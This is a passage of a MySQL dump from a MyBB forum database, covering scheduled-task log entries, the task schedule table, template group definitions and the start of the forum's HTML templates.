Jok3r\\\' WHERE name=\\\'boardclosed_reason\\\' LIMIT 1 \', )'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16191', '5', '1352778556', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16192', '9', '1352778616', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16193', '3', '1352778694', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16194', '9', '1352779025', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16195', '3', '1352779188', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16196', '1', '1352779235', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16197', '7', '1352779247', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16198', '5', '1352779974', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16199', '9', '1352780281', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16200', '5', '1352780708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16201', '9', '1352781214', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16202', '3', '1352781270', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16203', '9', '1352782098', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16204', '5', '1352782333', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16205', '9', '1352782609', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16206', '3', '1352782858', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16207', '1', '1352782861', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16208', '7', '1352783049', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16209', '5', '1352783130', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16210', '9', '1352783840', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16211', '5', '1352784671', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16212', '9', '1352785029', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16213', '3', '1352785035', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16214', '9', '1352785359', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16215', '5', '1352785593', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16216', '9', '1352786187', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16217', '3', '1352786446', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16218', '1', '1352786459', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16219', '7', '1352786897', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16220', '5', '1352788226', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16221', '9', '1352788379', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16222', '3', '1352788403', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16223', '9', '1352789484', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16224', '5', '1352790783', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16225', '3', '1352793005', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16226', '9', '1352792975', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16227', '1', '1352793048', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16228', '7', '1352793096', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16229', '5', '1352793285', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16230', '9', '1352796079', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16231', '3', '1352796092', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16232', '1', '1352796092', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16233', '7', '1352796131', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16234', '5', '1352796149', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16235', '5', '1352796646', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16236', '9', '1352797688', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16237', '3', '1352798207', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16238', '1', '1352798215', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16239', '7', '1352798242', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16240', '5', '1352798256', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16241', '9', '1352798428', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16242', '5', '1352798805', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16243', '9', '1352798853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16244', '3', '1352799076', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16245', '9', '1352799694', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16246', '5', '1352800004', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16247', '9', '1352800813', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16248', '3', '1352801452', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16249', '1', '1352801718', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16250', '7', '1352801732', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16251', '5', '1352801748', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16252', '9', '1352801876', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16253', '5', '1352803923', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16254', '9', '1352803937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16255', '3', '1352804087', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16256', '9', '1352804210', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16257', '3', '1352804422', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16258', '1', '1352804475', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16259', '7', '1352804586', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16260', '5', '1352804788', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16261', '9', '1352805168', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16262', '5', '1352807095', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16263', '9', '1352808663', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16264', '3', '1352808749', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16265', '5', '1352808754', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16266', '1', '1352808805', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16267', '7', '1352808869', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16268', '5', '1352809741', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16269', '9', '1352809751', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16270', '3', '1352809890', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16271', '9', '1352810986', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16272', '5', '1352811028', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16273', '9', '1352811631', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16274', '3', '1352811671', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16275', '1', '1352812004', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16276', '7', '1352812008', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16277', '5', '1352812103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16278', '9', '1352814506', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16279', '5', '1352814553', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16280', '3', '1352814781', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16281', '9', '1352815044', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16282', '3', '1352815157', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16283', '1', '1352816085', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16284', '7', '1352816091', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16285', '5', '1352817375', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16286', '9', '1352817397', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16287', '3', '1352817461', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16288', '9', '1352817681', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16289', '5', '1352818817', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16290', '9', '1352819316', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16291', '3', '1352819345', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16292', '1', '1352819399', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16293', '7', '1352819402', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16294', '5', '1352819766', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16295', '9', '1352819951', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16296', '5', '1352820437', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16297', '9', '1352820476', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16298', '3', '1352820671', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16299', '9', '1352822388', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16300', '5', '1352822392', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16301', '3', '1352822510', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16302', '1', '1352822631', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16303', '7', '1352822634', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16304', '5', '1352822761', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('16305', '9', '1352823060', 'The mass mail task successfully ran.'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_tasks`; CREATE TABLE `mybb_tasks` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `file` varchar(30) NOT NULL DEFAULT '', `minute` varchar(200) NOT NULL DEFAULT '', `hour` varchar(200) NOT NULL DEFAULT '', `day` varchar(100) NOT NULL DEFAULT '', `month` varchar(30) NOT NULL DEFAULT '', `weekday` varchar(15) NOT NULL DEFAULT '', `nextrun` bigint(30) NOT NULL DEFAULT '0', `lastrun` bigint(30) NOT NULL DEFAULT '0', `enabled` int(1) NOT NULL DEFAULT '1', `logging` int(1) NOT NULL DEFAULT '0', `locked` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`tid`) ) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_tasks` WRITE; INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('1', 'Hourly Cleanup', 'Cleans out old searches, captcha images and expires redirects', 'hourlycleanup', '0', '*', '*', '*', '*', '1352826000', '1352822631', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('2', 'Daily Cleanup', 'Cleans out old sessions and read threads', 'dailycleanup', '0', '0', '*', '*', '*', '1352851200', '1352765150', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('3', 'Half-hourly User Cleanup', 'Automatically expires bans, warnings and posting suspension and moderation times for users', 'usercleanup', '30,59', '*', '*', '*', '*', '1352824200', '1352822510', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('4', 'Weekly Backup', 'Automatically backups your MyBB tables to your backups directory.', 'backupdb', '0', '12', '*', '*', '0,1,2,3,4,5,6', '1352894400', '1352030782', '1', '1', '1352808847'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('5', 'Promotion System', 'Automatically runs the promotion system every 20 minutes.', 'promotions', '5,25,45', '*', '*', '*', '*', '1352823900', '1352822761', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('6', 'Thread Views', 'Automatically updates thread views every 15 minutes. This task will automatically be enabled or disabled when changing the \'Delayed Thread Views\' setting.', 'threadviews', '10,25,40,55', '*', '*', '*', '*', '1352823900', '1352823057', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('7', 'Tables Check', 'Automatically runs a table check and attempts to repair any crashed tables.', 'checktables', '0', '*', '*', '*', '*', '1352826000', '1352822634', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('8', 'Log Pruning', 'Automatically cleans up old MyBB log files (administrator, moderator, task, promotion, and mail logs)', 'logcleanup', '0', '0', '1', '*', '*', '1354320000', '1351742826', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('9', 'Mass Mail', 'Automatically sends any queued mass mailings every 15 minutes. ', 'massmail', '10,25,40,55', '*', '*', '*', '*', '1352823900', '1352823060', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('10', 'User Pruning', 'Automatically prunes users based on criteria set in the settings every day. ', 'userpruning', '*', '2', '*', '*', '*', '1342134000', '1342102209', '0', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('11', 'Delayed Moderation', 'Automatically performs delayed moderation actions every 24 hours.', 'delayedmoderation', '0', '0', '*', '*', '0,1,2,3,4,5,6', '1352851200', '1352765176', '1', '1', '0'); INSERT INTO `mybb_tasks` (`tid`, `title`, `description`, `file`, `minute`, `hour`, `day`, `month`, `weekday`, `nextrun`, `lastrun`, `enabled`, `logging`, `locked`) VALUES ('14', 'Achivements', 'Add users to automatically medals.', 'achivements', '*', '*', '*', '*', '0,1,2,3,4,5,6', '1352823660', '1352823615', '1', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_templategroups`; CREATE TABLE `mybb_templategroups` ( `gid` int(10) unsigned NOT NULL AUTO_INCREMENT, `prefix` varchar(50) NOT NULL DEFAULT '', `title` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`gid`) ) ENGINE=MyISAM AUTO_INCREMENT=40 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_templategroups` WRITE; INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('1', 'calendar', '<lang:group_calendar>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('2', 'editpost', '<lang:group_editpost>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('3', 'forumbit', '<lang:group_forumbit>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('4', 'forumjump', '<lang:group_forumjump>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('5', 'forumdisplay', '<lang:group_forumdisplay>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('6', 'index', '<lang:group_index>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('7', 'error', '<lang:group_error>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('8', 'memberlist', '<lang:group_memberlist>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('9', 'multipage', '<lang:group_multipage>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('10', 'private', '<lang:group_private>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('11', 'portal', '<lang:group_portal>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('12', 'postbit', '<lang:group_postbit>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('13', 'redirect', '<lang:group_redirect>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('14', 'showthread', '<lang:group_showthread>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('15', 'usercp', '<lang:group_usercp>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('16', 'online', '<lang:group_online>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('17', 'moderation', '<lang:group_moderation>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('18', 'nav', '<lang:group_nav>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('19', 'search', '<lang:group_search>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('20', 'showteam', '<lang:group_showteam>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('21', 'reputation', '<lang:group_reputation>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('22', 'newthread', '<lang:group_newthread>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('23', 'newreply', '<lang:group_newreply>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('24', 'member', '<lang:group_member>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('25', 'warnings', '<lang:group_warning>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('26', 'global', '<lang:group_global>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('27', 'header', '<lang:group_header>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('28', 'managegroup', '<lang:group_managegroup>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('29', 'misc', '<lang:group_misc>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('30', 'modcp', '<lang:group_modcp>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('31', 'php', '<lang:group_php>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('32', 'polls', '<lang:group_polls>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('33', 'post', '<lang:group_post>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('34', 'printthread', '<lang:group_printthread>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('35', 'report', '<lang:group_report>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('36', 'smilieinsert', '<lang:group_smilieinsert>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('37', 'stats', '<lang:group_stats>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('38', 'xmlhttp', '<lang:group_xmlhttp>'); INSERT INTO `mybb_templategroups` (`gid`, `prefix`, `title`) VALUES ('39', 'footer', '<lang:group_footer>'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_templates`; CREATE TABLE `mybb_templates` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(120) NOT NULL DEFAULT '', `template` text NOT NULL, `sid` int(10) NOT NULL DEFAULT '0', `version` varchar(20) NOT NULL DEFAULT '0', `status` varchar(10) NOT NULL DEFAULT '', `dateline` int(10) NOT NULL DEFAULT '0', PRIMARY KEY (`tid`) ) ENGINE=MyISAM AUTO_INCREMENT=2090 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_templates` WRITE; INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1', 'forumdisplay_threadlist', '<div class=\"float_left\"> {$multipage} </div> <div class=\"float_right\"> {$newthread} </div> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td class=\"thead\" colspan=\"{$colspan}\"> <div style=\"float: right;\"> <span class=\"smalltext\"><strong><a href=\"misc.php?action=markread&amp;fid={$fid}{$post_code_string}\">{$lang->markforum_read}</a> | <a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;type=forum&amp;fid={$fid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a>{$clearstoredpass}</strong></span> </div> <div> <strong>{$foruminfo[\'name\']}</strong> </div> </td> </tr> <tr> <td class=\"tcat\" colspan=\"3\" width=\"66%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->thread}</a> {$orderarrow[\'subject\']} / <a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"7%\"><span 